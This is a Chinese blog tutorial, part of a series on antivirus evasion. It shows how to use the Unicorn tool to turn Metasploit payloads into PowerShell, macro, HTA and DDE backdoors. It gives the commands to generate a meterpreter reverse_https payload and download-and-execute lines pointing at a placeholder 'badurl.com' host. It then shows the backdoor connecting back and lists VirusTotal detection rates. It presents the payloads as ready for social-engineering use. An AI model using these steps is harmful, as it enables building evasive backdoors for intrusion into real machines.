【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)


当你的才华

还撑不起你的野心时

那你就应该静下心来学习


目录

0x01 Unicorn介绍

0x02 安装Unicorn

0x03 Unicorn使用说明

0x04 利用Unicorn生成后门

0x05 小结


                                                                                免杀能力一览表

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第1张图片

 

0x01 Unicorn介绍

Magic Unicorn是一个比较简单的小工具,主要是基于Matthew Graeber提出的PowerShell攻击技术以及David Kennedy和Josh Kelly 提出的powershell bypass技术,把所有payload都转换成powershell代码。

Magic Unicorn支持cobalt strike、Metasploit和自定义的shellcode。

 

0x02 安装Unicorn

安装比较简单

git clone https://github.com/trustedsec/unicorn.git

都不需要安装其他的python库,就可以直接运行。

当然还是需要已经安装了Msf才行,因为Unicorn生成payload还是依赖msf,只不过它把payload转换成了powershell命令来运行。

执行python unicorn.py即可。

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第2张图片

 

0x03 Unicorn使用说明

可以使用python unicorn.py --help命令查看详细帮助

主要的几个用法如下:​​​​​​​

Usage: python unicorn.py payload reverse_ipaddr port 
PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
PS Down/Exec Macro: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe macro
Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
Macro Example CS: python unicorn.py  cs macro
HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms
HTA Example CS: python unicorn.py  cs hta
HTA Example SettingContent-ms: python unicorn.py : shellcode ms
DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
CRT Example: python unicorn.py  crt
Custom PS1 Example: python unicorn.py 
Custom PS1 Example: python unicorn.py  macro 500
Cobalt Strike Example: python unicorn.py  cs (export CS in C# format)
Custom Shellcode: python unicorn.py  shellcode (formatted 0x00 or metasploit)
Custom Shellcode HTA: python unicorn.py  shellcode hta (formatted 0x00 or metasploit)
Custom Shellcode Macro: python unicorn.py  shellcode macro (formatted 0x00 or metasploit)
Generate .SettingContent-ms: python unicorn.py ms
Help Menu: python unicorn.py --help

支持生成ps1、macro、hta、dde等形式的代码和文件。

 

0x04 利用Unicorn生成后门

我以最常规的windows/meterpreter/reverse_https来生成payload

生成命令为

python unicorn.py windows/meterpreter/reverse_https 10.211.55.2 3334

其中10.211.55.23334是我msf监听的ip和端口

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第3张图片

生成了两个文件powershell_attack.txtunicorn.rc

其中powershell_attack.txt是生成的payload

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第4张图片

unicorn.rc是msf配置文件,也就是用msfconsole -r unicorn.rc命令可以快捷的启动msf并监听相应端口

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第5张图片

然后我们在测试机器上执行powershell_attack.txt里的代码

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第6张图片

 

可正常上线

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第7张图片

可以把powershell代码转换成exe,使用bat2exe就可以,生成ps1.exe

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第8张图片

执行ps1.exe,发现触发了360安全卫士的行为检测,不过火绒没有反应。

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第9张图片

virustotal.com上powershell_attack.txt文件的查杀率为14/57

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第10张图片

virustotal.com上ps1.exe文件的查杀率为36/69,转exe后略微有点惨。

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第11张图片

后来生成了一个hta文件进行测试,virustotal.com上查杀率为29/56

【免杀篇】远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)_第12张图片

 

0x05 小结

Unicorn使用比较简单,可以生成powershell代码、macro宏代码、hta、dde等格式的payload文件,可以在社工时直接使用,不过因为生成的代码关键字比较明显,所以静态查杀很多都没通过,只能说生成代码多样但免杀效果一般。

上面用到bat2exe工具和zirikatu已经放在tools文件夹中,还算挺好使。

https://github.com/TideSec/BypassAntiVirus/tree/master/tools

 

参考链接:

magic-unicorn:https://www.hackingarticles.in/magic-unicorn-powershell-downgrade-attack-and-exploitation-tool/

过win10防火墙和windows defender:https://null-byte.wonderhowto.com/how-to/hacking-windows-10-create-undetectable-payload-part-1-bypassing-antivirus-software-0185055/

 


虽然我们生活在阴沟里,但依然有人仰望星空!


 

你可能感兴趣的:(免杀篇)